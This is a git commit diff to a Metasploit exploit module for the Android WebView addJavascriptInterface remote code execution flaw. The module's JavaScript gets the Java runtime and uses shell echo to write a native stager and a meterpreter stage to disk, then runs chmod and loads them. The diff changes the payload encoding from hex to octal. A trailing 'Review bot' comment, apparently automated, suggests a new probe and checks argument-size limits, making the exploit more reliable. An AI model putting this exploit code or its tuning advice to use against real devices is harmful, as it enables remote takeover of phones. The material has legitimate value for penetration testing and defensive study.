Use octal encoding and -e, so that echo always works.

bug/bundler_fix
Joe Vennix 2014-04-17 01:17:42 -05:00
parent fc841331d2
commit 8920e0cc80
No known key found for this signature in database
GPG Key ID: 127B05FB3E85A2B0
1 changed files with 9 additions and 20 deletions


@ -69,7 +69,11 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
['URL', 'http://50.56.33.56/blog/?p=314'],
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
['CVE', '2012-6636'], # original CVE for addJavascriptInterface
['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
['EDB', '31519'],
['OSVDB', '97520']
],
'Platform' => 'android',
'Arch' => ARCH_DALVIK,
@ -89,8 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote
def on_request_uri(cli, req)
if req.uri =~ /\.js/
serve_static_js(cli, req)
elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100
print_warning "Received message: #{req.body}"
else
super
end
@ -139,28 +141,15 @@ class Metasploit3 < Msf::Exploit::Remote
.getMethod('getRuntime', null)
.invoke(null, null);
// now ensure we can write out a hex-encoded byte with the shell's echo builtin
var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']);
if (byte.indexOf("\\\\") > -1) {
// if youre havin byte problems
var xml = new XMLHttpRequest();
// i feel bad for you son
xml.open('POST', '#{get_module_resource}.msg', false);
// i got \\x63 problems
xml.send("Unsupported shell echo builtin: exploit aborted.");
// but your shell aint one
return true;
}
// libraryData contains the bytes for a native shared object built via NDK
// which will load the "stage", which in this case is our android meterpreter stager.
// LibraryData is loaded via ajax later, because we have to access javascript in
// order to detect what arch we are running.
var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename, arch), '\\\\x')}";
var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
// the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
// another stager which loads android meterpreter from the msf handler.
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
// get the process name, which will give us our data path
// $PPID does not seem to work on android 4.0, so we concat pids manually
@ -170,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote
var stagePath = path + '/#{stagename}.apk';
// build the library and chmod it
runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
runtime.exec(['chmod', '700', libraryPath]).waitFor();
// build the stage, chmod it, and load it
runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
runtime.exec(['chmod', '700', stagePath]).waitFor();
// load the library (this fails in x86, figure out why)
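Review bot: The runtime probe that checked the shell's echo builtin actually interprets escapes (the removed `echo "\\\\x66"` test with its `.msg` report-back) is dropped, but nothing replaces it for the new `echo -e "…\\0NNN…"` form used by the two `runtime.exec` lines in the last hunk, so on a `/system/bin/sh` whose echo does not take `-e` (the flag would land in libraryPath as literal text, or the escapes stay uninterpreted) the stager is silently corrupted and the failure only surfaces at the later load step with no feedback to the operator. A one-line probe in the same spirit keeps the early abort: `var probe = exec(runtime, ['/system/bin/sh', '-c', 'echo -e "\\\\0146"']); if (probe.indexOf('f') !== 0) { return true; }` — presumably mksh on 4.0+ is the target and passes this, so it only costs the older shells a clean exit instead of a corrupt file. Note also that octal needs five characters per byte where hex needed four, so the single `-c` argument carrying libraryData grows by a quarter; worth confirming the NDK stager still fits under the per-argument size limit on the kernels you target. The enclosing function's body continues outside the hunk.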